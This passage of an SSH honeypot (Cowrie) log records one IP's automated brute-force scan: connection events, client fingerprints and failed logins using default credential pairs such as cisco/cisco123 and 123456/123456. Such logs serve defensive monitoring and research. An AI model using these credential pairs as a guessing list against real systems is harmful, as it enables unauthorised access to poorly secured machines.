sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:15:48.746498Z","src_ip":"212.227.235.229","session":"09df03c022bf"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"cisco123","message":"login attempt [cisco/cisco123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:15:48.855964Z","src_ip":"212.227.235.229","session":"dcf9c7300fe5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46086,"dst_ip":"1.2.3.4","dst_port":22,"session":"c36d2644fe2f","protocol":"ssh","message":"New connection: 212.227.235.229:46086 (1.2.3.4:22) [session: c36d2644fe2f]","sensor":"my-vps","timestamp":"2025-08-26T21:15:50.082391Z"}
{"eventid":"cowrie.login.failed","username":"super","password":"super1234","message":"login attempt [super/super1234] failed","sensor":"my-vps","timestamp":"2025-08-26T21:15:50.531914Z","src_ip":"212.227.235.229","session":"09df03c022bf"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:15:50.539118Z","src_ip":"212.227.235.229","session":"c36d2644fe2f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:15:50.571597Z","src_ip":"212.227.235.229","session":"c36d2644fe2f"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:15:51.324162Z","src_ip":"212.227.235.229","session":"dcf9c7300fe5"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:15:52.648892Z","src_ip":"212.227.235.229","session":"09df03c022bf"}
{"eventid":"cowrie.login.failed","username":"123456","password":"123456","message":"login attempt [123456/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:15:53.659039Z","src_ip":"212.227.235.229","session":"c36d2644fe2f"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:15:55.591188Z","src_ip":"212.227.235.229","session":"c36d2644fe2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55838,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8fdaafdbf43","protocol":"ssh","message":"New connection: 212.227.235.229:55838 (1.2.3.4:22) [session: b8fdaafdbf43]","sensor":"my-vps","timestamp":"2025-08-26T21:16:05.563377Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55852,"dst_ip":"1.2.3.4","dst_port":22,"session":"14b33c248e66","protocol":"ssh","message":"New connection: 212.227.235.229:55852 (1.2.3.4:22) [session: 14b33c248e66]","sensor":"my-vps","timestamp":"2025-08-26T21:16:05.800350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:16:05.809335Z","src_ip":"212.227.235.229","session":"14b33c248e66"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:16:05.810494Z","src_ip":"212.227.235.229","session":"b8fdaafdbf43"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:16:05.891770Z","src_ip":"212.227.235.229","session":"b8fdaafdbf43"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:16:06.093479Z","src_ip":"212.227.235.229","session":"14b33c248e66"}
{"eventid":"cowrie.login.failed","username":"master","password":"master","message":"login attempt [master/master] failed","sensor":"my-vps","timestamp":"2025-08-26T21:16:07.049620Z","src_ip":"212.227.235.229","session":"b8fdaafdbf43"}
{"eventid":"cowrie.login.failed","username":"sergey","password":"sergey","message":"login attempt [sergey/sergey] failed","sensor":"my-vps","timestamp":"2025-08-26T21:16:08.067985Z","src_ip":"212.227.235.229","session":"14b33c248e66"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:16:08.306500Z","src_ip":"212.227.235.229","session":"b8fdaafdbf43"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:16:09.798558Z","src_ip":"212.227.235.229","session":"14b33c248e66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47684,"dst_ip":"1.2.3.4","dst_port":22,"session":"107eee73bfe7","protocol":"ssh","message":"New connection: 212.227.235.229:47684 (1.2.3.4:22) [session: 107eee73bfe7]","sensor":"my-vps","timestamp":"2025-08-26T21:16:15.197407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:16:15.243956Z","src_ip":"212.227.235.229","session":"107eee73bfe7"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:16:15.450981Z","src_ip":"212.227.235.229","session":"107eee73bfe7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47696,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fcab759c277","protocol":"ssh","message":"New connection: 212.227.235.229:47696 (1.2.3.4:22) [session: 0fcab759c277]","sensor":"my-vps","timestamp":"2025-08-26T21:16:16.521971Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:16:16.583369Z","src_ip":"212.227.235.229","session":"0fcab759c277"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:16:16.827360Z","src_ip":"212.227.235.229","session":"0fcab759c277"}
{"eventid":"cowrie.login.failed","username":"secret","password":"secret","message":"login attempt [secret/secret] failed","sensor":"my-vps","timestamp":"2025-08-26T21:16:16.839881Z","src_ip":"212.227.235.229","session":"107eee73bfe7"}
{"eventid":"cowrie.login.failed","username":"carol","password":"carol","message":"login attempt [carol/carol] failed","sensor":"my-vps","timestamp":"2025-08-26T21:16:17.953815Z","src_ip":"212.227.235.229","session":"0fcab759c277"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:16:19.134525Z","src_ip":"212.227.235.229","session":"107eee73bfe7"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:16:19.609107Z","src_ip":"212.227.235.229","session":"0fcab759c277"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46654,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa4205631b6b","protocol":"ssh","message":"New connection: 212.227.235.229:46654 (1.2.3.4:22) [session: fa4205631b6b]","sensor":"my-vps","timestamp":"2025-08-26T21:16:20.443783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:16:20.466293Z","src_ip":"212.227.235.229","session":"fa4205631b6b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:16:20.708451Z","src_ip":"212.227.235.229","session":"fa4205631b6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46668,"dst_ip":"1.2.3.4","dst_port":22,"session":"054e691fa633","protocol":"ssh","message":"New connection: 212.227.235.229:46668 (1.2.3.4:22) [session: 054e691fa633]","sensor":"my-vps","timestamp":"2025-08-26T21:16:24.567873Z"}
